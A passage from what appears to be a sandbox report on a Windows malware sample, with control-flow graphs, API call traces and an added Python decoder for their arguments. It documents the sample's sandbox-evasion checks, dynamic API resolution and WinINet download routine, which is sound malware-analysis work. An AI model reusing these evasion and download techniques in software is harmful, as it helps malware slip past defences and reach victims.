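        print(f"ExitProcess at {gt.exit_at:x} <- block {gt.via:x} ({how}: {', '.join(gt.checks)})")
```

Run on this graph it prints five lines. The exits at 421c7d, 421cb0 and 421ce0 are the environment gates: GetSystemInfo; the sub_401030 and sub_4010c0 subcalls (VirtualAllocExNuma and GlobalMemoryStatusEx in the subcall lines above) together with GetUserDefaultLangID; and the sub_422a40/sub_423e10 pair. The first exit at 421c65 is decided in a block with no API call of its own, so the nearest earlier calls are reported instead, and the last one at 421ea5 is the normal end of the routine after CreateEventA rather than a check. The self-edge 2228->2228 kept in `preds` is the CloseHandle/Sleep/OpenEventA loop that re-opens the event with a Sleep between attempts until it no longer exists, after which CreateEventA runs.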

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 406c40-406c64 call 402930 2237 406c75-406c97 call 404bc0 2234->2237 2238 406c66-406c6b 2234->2238 2242 406c99 2237->2242 2243 406caa-406cba call 402930 2237->2243 2238->2237 2239 406c6d-406c6f lstrcpy 2238->2239 2239->2237 2244 406ca0-406ca8 2242->2244 2247 406cc8-406cf5 InternetOpenA StrCmpCA 2243->2247 2248 406cbc-406cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 406cf7 2247->2249 2250 406cfa-406cfc 2247->2250 2248->2247 2249->2250 2251 406d02-406d22 InternetConnectA 2250->2251 2252 406ea8-406ebb call 402930 2250->2252 2253 406ea1-406ea2 InternetCloseHandle 2251->2253 2254 406d28-406d5d HttpOpenRequestA 2251->2254 2261 406ec9-406ee0 call 402a20 * 2 2252->2261 2262 406ebd-406ebf 2252->2262 2253->2252 2256 406d63-406d65 2254->2256 2257 406e94-406e9e InternetCloseHandle 2254->2257 2259 406d67-406d77 InternetSetOptionA 2256->2259 2260 406d7d-406dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 406dd4-406de4 call 423d90 2260->2263 2264 406daf-406dd3 call 4271e0 call 402a20 * 2 2260->2264 2262->2261 2265 406ec1-406ec3 lstrcpy 2262->2265 2263->2264 2275 406de6-406de8 2263->2275 2265->2261 2276 406e8d-406e8e InternetCloseHandle 2275->2276 2277 406dee-406e07 InternetReadFile 2275->2277 2276->2257 2277->2276 2279 406e0d 2277->2279 2281 406e10-406e15 2279->2281 2281->2276 2283 406e17-406e3d call 427310 2281->2283 2286 406e44-406e51 call 402930 2283->2286 2287 406e3f call 402a20 2283->2287 2291 406e61-406e8b call 402a20 InternetReadFile 2286->2291 2292 406e53-406e57 2286->2292 2287->2286 2291->2276 2291->2281 2292->2291 2293 406e59-406e5b lstrcpy 2292->2293 2293->2291
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00406C6F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406CC2
                          • InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 00406CD5
                          • StrCmpCA.SHLWAPI(?,00FBE538), ref: 00406CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,00FBD990,00000000,00000000,-00400100,00000000), ref: 00406D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00406E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00406E8E
                          • InternetCloseHandle.WININET(?), ref: 00406E98
                          • InternetCloseHandle.WININET(00000000), ref: 00406EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00406EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 4e49c96fccde84a7acdfb28c75d2ae3e132fd84c83d84d1e2d8bf925d7c46bd0
                          • Instruction ID: 91590bf360eea9fd530f380bfccddf156e0f5cf0bac8cd817fa6b8c96a2a5053
                          • Opcode Fuzzy Hash: 4e49c96fccde84a7acdfb28c75d2ae3e132fd84c83d84d1e2d8bf925d7c46bd0
                          • Instruction Fuzzy Hash: 3B816F71B10315ABEB20DFA5DC89BAF77B9AF44700F154069F905B72C0DB78AD058BA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 404a60-404afc RtlAllocateHeap 2867 404b7a-404bbe VirtualProtect 2850->2867 2868 404afe-404b03 2850->2868 2869 404b06-404b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404AA3
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 36c237bca2f24804bca255b9ecae7caa065b10654710d6113a3736e4754386b3
                          • Instruction ID: 2f413e443fbc1c09a45ce1161c2721836de4c0241506bf7b32ac51e3216322a2
                          • Opcode Fuzzy Hash: 36c237bca2f24804bca255b9ecae7caa065b10654710d6113a3736e4754386b3
                          • Instruction Fuzzy Hash: 0A310398B8022C769620EBFF4C47F9F6E55DFCD760F212097750857180C9A96680CBEA
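The argument lists the sandbox prints are raw stack slots in parameter order, with "?" where a value was not captured. As an added example (not part of the Joe Sandbox report or of the sample), the Python below pairs those slots with the documented Win32 prototypes and decodes the constants, using the lines from sub_406c40, the sub_401030 subcall and sub_404a60 above as input. The prototypes and constant values are the documented ones (INTERNET_OPEN_TYPE_DIRECT = 1, INTERNET_SERVICE_HTTP = 3, INTERNET_OPTION_SECURITY_FLAGS = 31, HTTP_QUERY_STATUS_CODE = 19, MEM_COMMIT|MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40, PAGE_GUARD = 0x100). Treating the five values on the GetCurrentProcess line as the arguments of the VirtualAllocExNuma call that follows it is my reading of the stack dump, not something the report states.

```python
"""Added example (not part of the Joe Sandbox report): pair the positional argument
dumps in the "APIs" listings above with the documented Win32 parameter names and
decode the WinINet, allocation and page-protection constants they carry. The sample
lines are copied from sub_406c40, the sub_401030 subcall and sub_404a60."""
import re

API_LINE = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<api>\w+)\.(?P<mod>\w+)"
                      r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")
HEXARG = re.compile(r"^-?[0-9A-F]{8}$")      # raw stack slot; the sandbox prints some of them signed

# Documented Win32 prototypes (parameter order) for the calls that appear in the listings.
PROTOS = {
    "InternetOpenA": ["lpszAgent", "dwAccessType", "lpszProxy", "lpszProxyBypass", "dwFlags"],
    "InternetConnectA": ["hInternet", "lpszServerName", "nServerPort", "lpszUserName", "lpszPassword",
                         "dwService", "dwFlags", "dwContext"],
    "HttpOpenRequestA": ["hConnect", "lpszVerb", "lpszObjectName", "lpszVersion", "lpszReferrer",
                         "lplpszAcceptTypes", "dwFlags", "dwContext"],
    "InternetSetOptionA": ["hInternet", "dwOption", "lpBuffer", "dwBufferLength"],
    "HttpSendRequestA": ["hRequest", "lpszHeaders", "dwHeadersLength", "lpOptional", "dwOptionalLength"],
    "HttpQueryInfoA": ["hRequest", "dwInfoLevel", "lpBuffer", "lpdwBufferLength", "lpdwIndex"],
    "InternetReadFile": ["hFile", "lpBuffer", "dwNumberOfBytesToRead", "lpdwNumberOfBytesRead"],
    "VirtualProtect": ["lpAddress", "dwSize", "flNewProtect", "lpflOldProtect"],
    "VirtualAllocExNuma": ["hProcess", "lpAddress", "dwSize", "flAllocationType", "flProtect", "nndPreferred"],
}
ENUMS = {  # (prototype, parameter) -> exact-value names
    ("InternetOpenA", "dwAccessType"): {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                                        3: "INTERNET_OPEN_TYPE_PROXY"},
    ("InternetConnectA", "dwService"): {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                                        3: "INTERNET_SERVICE_HTTP"},
    ("InternetSetOptionA", "dwOption"): {31: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("HttpQueryInfoA", "dwInfoLevel"): {19: "HTTP_QUERY_STATUS_CODE"},
}
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
        0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x100: "PAGE_GUARD"}
FLAGS = {  # (prototype, parameter) -> bit names
    ("VirtualAllocExNuma", "flAllocationType"): {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"},
    ("VirtualAllocExNuma", "flProtect"): PAGE,
    ("VirtualProtect", "flNewProtect"): PAGE,
}

LISTING = """
• InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 00406CD5
• StrCmpCA.SHLWAPI(?,00FBE538), ref: 00406CED
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406D15
• HttpOpenRequestA.WININET(00000000,GET,?,00FBD990,00000000,00000000,-00400100,00000000), ref: 00406D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406D86
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406DFF
• InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406E7D
  • Part of subcall function 00401030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401046
  • Part of subcall function 00401030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0040104D
• VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404BB0
"""


def decode(proto, name, raw):
    """One argument: enum or flag names where the value is known, otherwise hex (decimal)."""
    if raw == "?":
        return "not captured"
    if not HEXARG.match(raw):
        return raw                                   # inline string such as GET
    v = int(raw, 16)
    if (proto, name) in ENUMS:
        return ENUMS[(proto, name)].get(v, f"unknown 0x{v:X}")
    if (proto, name) in FLAGS:
        table = FLAGS[(proto, name)]
        names = [n for bit, n in table.items() if v & bit]
        rest = v & ~sum(bit for bit in table if v & bit)
        return "|".join(names + ([f"0x{rest:X}"] if rest else [])) or f"0x{v:X}"
    return f"0x{v & 0xFFFFFFFF:X} ({v})"


def annotate(line):
    """Parse one '• Api.MODULE(args), ref: addr' line into named, decoded parameters."""
    m = API_LINE.search(line)
    if not m:
        return None
    api = proto = m["api"]
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    # Interpretation, not something the report states: GetCurrentProcess takes no arguments,
    # so the five slots printed on its line in sub_401030 are the ones already pushed for the
    # VirtualAllocExNuma call that follows it; its hProcess is the value GetCurrentProcess returns.
    if api == "GetCurrentProcess" and len(args) == 5:
        proto, args = "VirtualAllocExNuma", ["<GetCurrentProcess()>"] + args
    names = PROTOS.get(proto) or [f"arg{i}" for i in range(len(args))]
    return {"api": api, "proto": proto, "module": m["mod"], "ref": int(m["ref"], 16), "subcall": m["sub"],
            "params": [(n, a, decode(proto, n, a)) for n, a in zip(names, args)]}


def annotate_listing(text):
    return [c for c in map(annotate, text.splitlines()) if c]


if __name__ == "__main__":
    for c in annotate_listing(LISTING):
        print(f"{c['ref']:08X} {c['proto']:<19}", ", ".join(f"{n}={d}" for n, _, d in c["params"]))
```

The decoded rows state what the listing only implies: sub_406c40 opens a direct (no proxy) WinINet session, connects with INTERNET_SERVICE_HTTP, issues a GET, sets INTERNET_OPTION_SECURITY_FLAGS on the request, queries HTTP_QUERY_STATUS_CODE and reads the body in 1999-byte (0x7CF) chunks; sub_401030 asks for a 2000-byte MEM_COMMIT|MEM_RESERVE allocation with PAGE_EXECUTE_READWRITE through VirtualAllocExNuma and calls ExitProcess in the same subcall; sub_404a60 applies PAGE_GUARD, which is the guard-page behaviour the report flags at the top. Two values are left raw on purpose: lpBuffer of InternetSetOptionA is a pointer, so the security flags it points to are not in the listing, and dwFlags of HttpOpenRequestA is printed signed (-00400100) and is shown only in its unsigned 32-bit form.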
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00422A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 6c1fa00503cf644c0ad8ae9dfa58bb6559640976417a912d3d4b7ac5badfbdc6
                          • Instruction ID: daca8bc385b25320d3fa5486434c0ccaa4de5bcaee4211da3630c20ba90b8488
                          • Opcode Fuzzy Hash: 6c1fa00503cf644c0ad8ae9dfa58bb6559640976417a912d3d4b7ac5badfbdc6
                          • Instruction Fuzzy Hash: DBF0B4B1A44214AFC700DF88DD49B9EBBBCF704B21F10021AFD15E3280D7B419048BE1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 4266e0-4266e7 634 426afe-426b92 LoadLibraryA * 8 633->634 635 4266ed-426af9 GetProcAddress * 43 633->635 636 426b94-426c03 GetProcAddress * 5 634->636 637 426c08-426c0f 634->637 635->634 636->637 638 426cd2-426cd9 637->638 639 426c15-426ccd GetProcAddress * 8 637->639 640 426cdb-426d4a GetProcAddress * 5 638->640 641 426d4f-426d56 638->641 639->638 640->641 642 426de9-426df0 641->642 643 426d5c-426de4 GetProcAddress * 6 641->643 644 426f10-426f17 642->644 645 426df6-426f0b GetProcAddress * 12 642->645 643->642 646 426f19-426f88 GetProcAddress * 5 644->646 647 426f8d-426f94 644->647 645->644 646->647 648 426fc1-426fc8 647->648 649 426f96-426fbc GetProcAddress * 2 647->649 650 426ff5-426ffc 648->650 651 426fca-426ff0 GetProcAddress * 2 648->651 649->648 652 427002-4270e8 GetProcAddress * 10 650->652 653 4270ed-4270f4 650->653 651->650 652->653 654 427152-427159 653->654 655 4270f6-42714d GetProcAddress * 4 653->655 656 42715b-427169 GetProcAddress 654->656 657 42716e-427175 654->657 655->654 656->657 658 4271d3 657->658 659 427177-4271ce GetProcAddress * 4 657->659 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75550000,00FA62C0), ref: 004266F5
                          • GetProcAddress.KERNEL32(75550000,00FA6440), ref: 0042670D
                          • GetProcAddress.KERNEL32(75550000,00FB8EF8), ref: 00426726
                          • GetProcAddress.KERNEL32(75550000,00FB8F10), ref: 0042673E
                          • GetProcAddress.KERNEL32(75550000,00FBCB30), ref: 00426756
                          • GetProcAddress.KERNEL32(75550000,00FBCA28), ref: 0042676F
                          • GetProcAddress.KERNEL32(75550000,00FAB0B8), ref: 00426787
                          • GetProcAddress.KERNEL32(75550000,00FBC980), ref: 0042679F
                          • GetProcAddress.KERNEL32(75550000,00FBCAA0), ref: 004267B8
                          • GetProcAddress.KERNEL32(75550000,00FBCA58), ref: 004267D0
                          • GetProcAddress.KERNEL32(75550000,00FBC998), ref: 004267E8
                          • GetProcAddress.KERNEL32(75550000,00FA62A0), ref: 00426801
                          • GetProcAddress.KERNEL32(75550000,00FA6380), ref: 00426819
                          • GetProcAddress.KERNEL32(75550000,00FA6540), ref: 00426831
                          • GetProcAddress.KERNEL32(75550000,00FA6360), ref: 0042684A
                          • GetProcAddress.KERNEL32(75550000,00FBCAB8), ref: 00426862
                          • GetProcAddress.KERNEL32(75550000,00FBC9B0), ref: 0042687A
                          • GetProcAddress.KERNEL32(75550000,00FAB2E8), ref: 00426893
                          • GetProcAddress.KERNEL32(75550000,00FA63A0), ref: 004268AB
                          • GetProcAddress.KERNEL32(75550000,00FBCB00), ref: 004268C3
                          • GetProcAddress.KERNEL32(75550000,00FBC950), ref: 004268DC
                          • GetProcAddress.KERNEL32(75550000,00FBCA70), ref: 004268F4
                          • GetProcAddress.KERNEL32(75550000,00FBCB48), ref: 0042690C
                          • GetProcAddress.KERNEL32(75550000,00FA63C0), ref: 00426925
                          • GetProcAddress.KERNEL32(75550000,00FBC9C8), ref: 0042693D
                          • GetProcAddress.KERNEL32(75550000,00FBCB60), ref: 00426955
                          • GetProcAddress.KERNEL32(75550000,00FBCA40), ref: 0042696E
                          • GetProcAddress.KERNEL32(75550000,00FBCA88), ref: 00426986
                          • GetProcAddress.KERNEL32(75550000,00FBC9E0), ref: 0042699E
                          • GetProcAddress.KERNEL32(75550000,00FBCAD0), ref: 004269B7
                          • GetProcAddress.KERNEL32(75550000,00FBCAE8), ref: 004269CF
                          • GetProcAddress.KERNEL32(75550000,00FBC9F8), ref: 004269E7
                          • GetProcAddress.KERNEL32(75550000,00FBC938), ref: 00426A00
                          • GetProcAddress.KERNEL32(75550000,00FBA1C8), ref: 00426A18
                          • GetProcAddress.KERNEL32(75550000,00FBCBF0), ref: 00426A30
                          • GetProcAddress.KERNEL32(75550000,00FBCB18), ref: 00426A49
                          • GetProcAddress.KERNEL32(75550000,00FA6500), ref: 00426A61
                          • GetProcAddress.KERNEL32(75550000,00FBCA10), ref: 00426A79
                          • GetProcAddress.KERNEL32(75550000,00FA63E0), ref: 00426A92
                          • GetProcAddress.KERNEL32(75550000,00FBCB78), ref: 00426AAA
                          • GetProcAddress.KERNEL32(75550000,00FBCBD8), ref: 00426AC2
                          • GetProcAddress.KERNEL32(75550000,00FA6400), ref: 00426ADB
                          • GetProcAddress.KERNEL32(75550000,00FA6460), ref: 00426AF3
                          • LoadLibraryA.KERNEL32(00FBC920,0042051F), ref: 00426B05
                          • LoadLibraryA.KERNEL32(00FBCB90), ref: 00426B16
                          • LoadLibraryA.KERNEL32(00FBCBA8), ref: 00426B28
                          • LoadLibraryA.KERNEL32(00FBCBC0), ref: 00426B3A
                          • LoadLibraryA.KERNEL32(00FBCC08), ref: 00426B4B
                          • LoadLibraryA.KERNEL32(00FBC968), ref: 00426B5D
                          • LoadLibraryA.KERNEL32(00FBCC68), ref: 00426B6F
                          • LoadLibraryA.KERNEL32(00FBCDE8), ref: 00426B80
                          • GetProcAddress.KERNEL32(75750000,00FA6900), ref: 00426B9C
                          • GetProcAddress.KERNEL32(75750000,00FBCE48), ref: 00426BB4
                          • GetProcAddress.KERNEL32(75750000,00FB8860), ref: 00426BCD
                          • GetProcAddress.KERNEL32(75750000,00FBCE30), ref: 00426BE5
                          • GetProcAddress.KERNEL32(75750000,00FA69C0), ref: 00426BFD
                          • GetProcAddress.KERNEL32(73B30000,00FAB0E0), ref: 00426C1D
                          • GetProcAddress.KERNEL32(73B30000,00FA6760), ref: 00426C35
                          • GetProcAddress.KERNEL32(73B30000,00FAB130), ref: 00426C4E
                          • GetProcAddress.KERNEL32(73B30000,00FBCDD0), ref: 00426C66
                          • GetProcAddress.KERNEL32(73B30000,00FBCE60), ref: 00426C7E
                          • GetProcAddress.KERNEL32(73B30000,00FA67A0), ref: 00426C97
                          • GetProcAddress.KERNEL32(73B30000,00FA6680), ref: 00426CAF
                          • GetProcAddress.KERNEL32(73B30000,00FBCE00), ref: 00426CC7
                          • GetProcAddress.KERNEL32(757E0000,00FA6960), ref: 00426CE3
                          • GetProcAddress.KERNEL32(757E0000,00FA6700), ref: 00426CFB
                          • GetProcAddress.KERNEL32(757E0000,00FBCC20), ref: 00426D14
                          • GetProcAddress.KERNEL32(757E0000,00FBCE78), ref: 00426D2C
                          • GetProcAddress.KERNEL32(757E0000,00FA6940), ref: 00426D44
                          • GetProcAddress.KERNEL32(758D0000,00FAB018), ref: 00426D64
                          • GetProcAddress.KERNEL32(758D0000,00FAB1F8), ref: 00426D7C
                          • GetProcAddress.KERNEL32(758D0000,00FBCCE0), ref: 00426D95
                          • GetProcAddress.KERNEL32(758D0000,00FA6780), ref: 00426DAD
                          • GetProcAddress.KERNEL32(758D0000,00FA6720), ref: 00426DC5
                          • GetProcAddress.KERNEL32(758D0000,00FAB220), ref: 00426DDE
                          • GetProcAddress.KERNEL32(76BE0000,00FBCE18), ref: 00426DFE
                          • GetProcAddress.KERNEL32(76BE0000,00FA68A0), ref: 00426E16
                          • GetProcAddress.KERNEL32(76BE0000,00FB8960), ref: 00426E2F
                          • GetProcAddress.KERNEL32(76BE0000,00FBCE90), ref: 00426E47
                          • GetProcAddress.KERNEL32(76BE0000,00FBCC80), ref: 00426E5F
                          • GetProcAddress.KERNEL32(76BE0000,00FA67C0), ref: 00426E78
                          • GetProcAddress.KERNEL32(76BE0000,00FA66A0), ref: 00426E90
                          • GetProcAddress.KERNEL32(76BE0000,00FBCEC0), ref: 00426EA8
                          • GetProcAddress.KERNEL32(76BE0000,00FBCD58), ref: 00426EC1
                          • GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00426ED7
                          • GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00426EEE
                          • GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00426F05
                          • GetProcAddress.KERNEL32(75670000,00FA66C0), ref: 00426F21
                          • GetProcAddress.KERNEL32(75670000,00FBCCC8), ref: 00426F39
                          • GetProcAddress.KERNEL32(75670000,00FBCEA8), ref: 00426F52
                          • GetProcAddress.KERNEL32(75670000,00FBCED8), ref: 00426F6A
                          • GetProcAddress.KERNEL32(75670000,00FBCEF0), ref: 00426F82
                          • GetProcAddress.KERNEL32(759D0000,00FA69E0), ref: 00426F9E
                          • GetProcAddress.KERNEL32(759D0000,00FA6A00), ref: 00426FB6
                          • GetProcAddress.KERNEL32(76D80000,00FA6740), ref: 00426FD2
                          • GetProcAddress.KERNEL32(76D80000,00FBCF08), ref: 00426FEA
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6880), ref: 0042700A
                          • GetProcAddress.KERNEL32(6F5C0000,00FA67E0), ref: 00427022
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6860), ref: 0042703B
                          • GetProcAddress.KERNEL32(6F5C0000,00FBCC38), ref: 00427053
                          • GetProcAddress.KERNEL32(6F5C0000,00FA68C0), ref: 0042706B
                          • GetProcAddress.KERNEL32(6F5C0000,00FA68E0), ref: 00427084
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6920), ref: 0042709C
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6980), ref: 004270B4
                          • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 004270CB
                          • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 004270E2
                          • GetProcAddress.KERNEL32(75480000,00FBCCF8), ref: 004270FE
                          • GetProcAddress.KERNEL32(75480000,00FB8800), ref: 00427116
                          • GetProcAddress.KERNEL32(75480000,00FBCD70), ref: 0042712F
                          • GetProcAddress.KERNEL32(75480000,00FBCC50), ref: 00427147
                          • GetProcAddress.KERNEL32(753B0000,00FA6800), ref: 00427163
                          • GetProcAddress.KERNEL32(6EA10000,00FBCC98), ref: 0042717F
                          • GetProcAddress.KERNEL32(6EA10000,00FA69A0), ref: 00427197
                          • GetProcAddress.KERNEL32(6EA10000,00FBCCB0), ref: 004271B0
                          • GetProcAddress.KERNEL32(6EA10000,00FBCD10), ref: 004271C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 8a0bdfc08fccdd3cba7c5a7ed546d60d1095bcb3ca406ab1f60ec5b9cf0af696
                          • Instruction ID: 24e69b76aff6c9b7150681862aeee9ecdced478a12f1b503b046a4f57b6f05f2
                          • Opcode Fuzzy Hash: 8a0bdfc08fccdd3cba7c5a7ed546d60d1095bcb3ca406ab1f60ec5b9cf0af696
                          • Instruction Fuzzy Hash: 18625EB9A103009FD758DF65ED88AA637BBF789345310A91DF95683364DBB4A800DFB0
                          APIs
                          • lstrlen.KERNEL32(0042CFEC), ref: 0041F1D5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F1F1
                          • lstrlen.KERNEL32(0042CFEC), ref: 0041F1FC
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F215
                          • lstrlen.KERNEL32(0042CFEC), ref: 0041F220
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F239
                          • lstrcpy.KERNEL32(00000000,00434FA0), ref: 0041F25E
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F28C
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F2C0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F2F0
                          • lstrlen.KERNEL32(00FA6640), ref: 0041F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 8862ebf8b6f4e270906207828ff0c88485882796370b8098f26a52cfc15cf4be
                          • Instruction ID: 55742852dad097f903fca5b8627fb2a125a8e8ebffd627457b7393aea9bf8277
                          • Opcode Fuzzy Hash: 8862ebf8b6f4e270906207828ff0c88485882796370b8098f26a52cfc15cf4be
                          • Instruction Fuzzy Hash: CBA23270A012059FCB20DF65D948A9BB7F5AF44314F18847AE809EB3A1DB79DC86CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420013
                          • lstrlen.KERNEL32(0042CFEC), ref: 004200BD
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004200E1
                          • lstrlen.KERNEL32(0042CFEC), ref: 004200EC
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420110
                          • lstrlen.KERNEL32(0042CFEC), ref: 0042011B
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042013F
                          • lstrlen.KERNEL32(0042CFEC), ref: 0042015A
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420189
                          • lstrlen.KERNEL32(0042CFEC), ref: 00420194
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004201C3
                          • lstrlen.KERNEL32(0042CFEC), ref: 004201CE
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420206
                          • lstrlen.KERNEL32(0042CFEC), ref: 00420250
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00420288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0042059B
                          • lstrlen.KERNEL32(00FA6340), ref: 004205AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 004205D7
                          • lstrcat.KERNEL32(00000000,?), ref: 004205E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042060E
                          • lstrlen.KERNEL32(00FBDAF8), ref: 00420625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0042064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00420658
